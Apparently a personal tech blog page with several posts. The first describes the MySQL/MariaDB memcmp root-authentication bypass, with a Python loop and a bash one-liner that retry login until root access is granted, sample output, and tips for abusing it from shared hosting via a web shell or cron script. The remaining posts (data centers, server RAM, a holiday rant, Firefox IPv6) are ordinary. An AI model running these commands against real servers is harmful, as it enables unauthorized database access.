Cat Can Talk!

Well, it is funny that when you try to attempt to login into mysql(with CLI) root user with the wrong password for 300 to 512 times, it will just finally just you login as the root user, with the wrong password.

Vulnerable versions of MySQL and MariaDB are those compiled with libraries that return integers outside the -128 to 127 range for memcmp. According to Golubchik the gcc built in memcmp and BSD libc memcmp are safe, but the linux glibc sse-optimised memcmp is not safe.

Official builds from MySQL(Oracle), MariaDB are believe to be not vulnerable, but up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22, are potentially vulnerable.
5.1.63 and 5.5.24, which was just release recently have been verified that they do not have this hole.

Perhaps the proverb “When you fail, try again. Try harder until you success” is true after all in MySQL.
LOL

I’ve read from here, it shows you how to gain the root access of MySQL, using just a 1 line command python script.

#!/usr/bin/python
import subprocess

while 1:
subprocess.Popen(“mysql -u root mysql –password=blah”, shell=True).wait()

Below running the command:

relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
(The same shits happens for around 300 over times between these)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

And if you prefer to just do it manually inside the shell, you may want to try this as well.

$ for i in `seq 1 512`; do echo ‘select @@version;’ | mysql -h 127.0.0.1 -u root mysql –password=X 2>/dev/null && break; done

How To Fuck The Hole?
So, in order to exploit this hole, the attacker must have access to the MySQL server. Or at least, any type of account on the server, such as shell account or a hosting account.
So if your MySQL port is open for remote access, there are very high possibility that you are fucked!

If you currently having a shared hosting account, you might be able to screw the host off with several ways below:
1. If the host did not disable shell_exec, then you can actually upload an AJAX shell script to play with it.
2. shell_exec disabled? But you can create a cron? Then upload a bash script and let the cron execute the bash script to do the work for you.
And be expected that the host ban your ass after you play with this shit.

I Am Using MySQL Too! So, Am I Fucked!?
Well, it depends.
According to what I read from here, not all Linux distros are affected.
According to HD Moore, the only affected distros that are found to have the fucked versions of MySQL in their repo are as below:
1. Ubuntu 64bit (10.04, 10.10, 11.04, 11.10 and 12.04) Start from 1 LTS version, until the latest LTS version.
2. OpenSuSE 12.1 64-bit (So far only 1 version found to have hole.)
3. Fedora 16 64-bit (So far only 1 version found to have hole.)
4. Arch Linux

So, MySQL from which distro’s repo are proven to be safe at the moment?
They are as below:
1. Debian (Yeah! Luke, I am your father! ↑)
2. RHEL (Well, still worth to pay for its subscription in this case.)
3. CentOS (The exact same thing as RHEL without need to pay a single cent, so I take back my words at the line above.)
4. Gentoo (Well, it is indeed very solid.)
5. All other distros.

So far only builds from 4 distros listed at above are found to be fucked without condom, so, I am very sure that I am not fucked, as I don’t use any of those 4 affected distros in any of my servers at the moment.

If you are not hosting other people in your server, please lock your MySQL port to be accessing from outside.
If you are leaving the port open, then please tell me which distro you are using for your server and tell me its IP, I go and pay you a visit.

Just watched some video in Youtube, and found that it is quite interesting, so I just share it here.
As you all know, the most busy websites on the Internet, are Google and Facebook.

The videos below, are showing their main data center.
And no, they do not use only 1 data center, they have servers around the world, and the videos below, are only showing their main data center only.

Facebook Data Center

Google Data Center

In this post, I am not going to write too much.
I am just going to show some examples according to the reality, based on the requirement need by Windows 2008 R2 and latest versions of Linux/BSD distros.

The mission: Deploy a webserver to host PHP, MySQL, Apache/IIS. To host 10 WordPress websites which will be accepting 1000 unique visit a day each. Total will be accepting 5000+ unique visit and more than at least 20k pageloads a day.

Server Specifications:
Core2Quad Q8200 Quad Core 2.33Ghz
1333FSB (4MB Cache)
2GB DDR2 RAM
250GB SATA Hard Disk
4TB Monthly Bandwidth
5 IP Addresses
100mbps port
US$80/Month
Price and specs according to dedicated server plan 4 at http://cs-squad.net/whmcs-2/?ccce=cart&a=add&pid=17

What Windows Sysadmin will say:
2GB RAM!?
Are you nuts!?
It is just barely enough to just for the Windows 2008 R2 alone!
And you want to use it to host IIS, MySQL and PHP huh!?
And to host 10 websites!?
Are you out of your mind!?

What Linux Sysadmin will say:
Hmm… 2GB of RAM… Just the right amount of RAM to host 10 WordPress websites.
I just need to yum/apt-get what I need, and viola! Jobs done!
Will these 10 websites going to need innodb?
If innodb is not required, perhaps I am going to disable innodb in the mysql.ini and host several more websites in this server.

What BSD Sysadmin will say:
I believe, 2GB RAM will be more than enough for 10 WordPress websites.
As long as everything compiled nicely, I don’t think I need to worry about the server anymore, unless there are hardware issues or there is any patch to update.

Here, I would like to wish everyone Happy Chinese New Year!
May you have a prosperous year of Water Dragon!
Yes, I know, I am 7 days late. So I would also like to wish you a Happy Human Day! As 7th day of Chinese New Year, is the day that human was created, according to the legend.

This year I am not going to say anything bad, as I have run out of idea on what to curse people this year.
Also, my mood for this year is a little bit better than last year, so no point cursing people this year.
The only thing I can think of, is “Wish all iTards going to declare bankruptcy this for spending fuckloads of money to buy each model of iProducts! Wish you guys/gals credit card swipe until pecah!”

Ok, why I say my mood is better this year?

• 1. Because I get my new car 2 weeks before Chinese New Year, and able to drive a better car for go back to home town this year. No more suffering like last year, stuck in the fucking jam in PLUS highway.
• 2. Business getting much better since early of the year, so more cash to celebrate Chinese New Year for this year.
• 3. My web hosting business sales for January 2012, has break the highest monthly sales compare to the highest sales month of last year. It is a very good sign that in the first month of the year, can break the highest record of previous year!

But well, there are something that I am not so happy about this year.
Example:

• 1. The BCPM bill which going to kill the whole IT industry, everyone in the IT field. Although those noobs in MOSTI saying that this bill is actually intended to raise the Malaysia IT quality by forcing everyone to be certified in order to do anything related with IT, but the stupid bill is just going to kill everyone, as that bill require we all to be certified on every single component, if we wanted to touch the config file. Come on lar, just for touching 1 small server which running around 8 apps, then need to go and take exam for certified 8 certification only can touch that small server!? Like this you say stupid or not?
• 2. The stupid SOPA and PIPA bill proposed by the US government. Just google for it and you will find a lot of information related with this 2 bills. Although they had dropped SOPA, but they have ACTA as the backup in order to replace SOPA. And it seems worse also. Perhaps Obama is actually born in Malaysia 1, thats why he is so sohai like MOSTI people!
• 3. US$ value is still very low, compare to the time I just started to earn in US$. Although currently the rate now is 1 USD = 3.04100 MYR, but when the time I started to earn in US$, the rate is 3.6!
• 4. This is the most important 1. Najib+Rosmah and their 1Malaysia gang is still ruling the country and sucking our money to buy diamond rings and condos for cows to live… And no solid action was taken…

Anyway, to end this article, I wish you Happy Chinese New Year, and do not fucking message me to ask for ang pau, coz I will only give you an empty ang pau packet without money in it!

Firefox can support IPv6 without any problem. Unless you’ve been disabled the Firefox’s IPv6 resolve before this.
From the picture above, it is pretty straight forward on how to re-enable back IPv6 DNS resolve for Firefox.

At the address bar, just type in “about:config”, then you will be greeted with the “This might void your warranty” page.
Just click on the “I’ll be careful, I promise!” and proceed. Since when Firefox got warranty anyway? It is a free software after all.
Now, the advance configuration page will appear. Just type in “ipv6″ in the “Filter” area, then you can see the “network.dns.disableIPv6″. Just click it and press enter, it will toggle back to “false”.
Make sure the “Value” is false, because we want to prevent the disability of IPv6.

Ok, now you are free to close that page and continue to browse any IPv6 capable websites.